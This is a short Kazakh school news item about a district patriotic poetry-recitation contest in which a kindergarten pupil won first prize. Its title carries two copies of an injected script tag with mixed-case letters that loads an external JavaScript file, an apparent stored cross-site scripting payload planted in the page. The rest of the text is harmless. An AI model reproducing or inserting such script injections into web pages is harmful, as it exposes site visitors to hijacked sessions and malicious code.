«Мен елімнің патриотымын» мәнерлеп оқу сайысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.04.2019

2019 жылдың 26 сәуір күні №9 көпбейінді мектеп-гимназиясында аудандық «Мен елімнің патриотымын» атты  мәнерлеп оқу сайысы болды. Сайысқа барлығы 14 оқушы  қатысты. Сайыс екі кезеңнен тұрды: таныстыру және туған жерге, елге, Отанға арналған өлең шумақтарын жатқа айту. №10 жалпы түрдегі мектеп-интернаты жанындағы «Шұғыла» шағын орталығының «Күншуақ» тобының тәрбиеленушісі Орынбасар Саят қатысты. Саят өзін-өзі керемет өлең жолдарымен таныстырды. Асқар Оразақынның «Атамекенге оралғанда» Туған жер туралы өлең шумағын мәнерлеп жатқа айтты. Қорытындылай келе, Саят жүлделі І орынды дипломмен марапатталды.

Топ тәрбиешісі: Жұман Нұрсұлу Жақсыбекқызы

 

Просмотров: 986


Пікір қосу



Деректерді қолтаңбаға қосу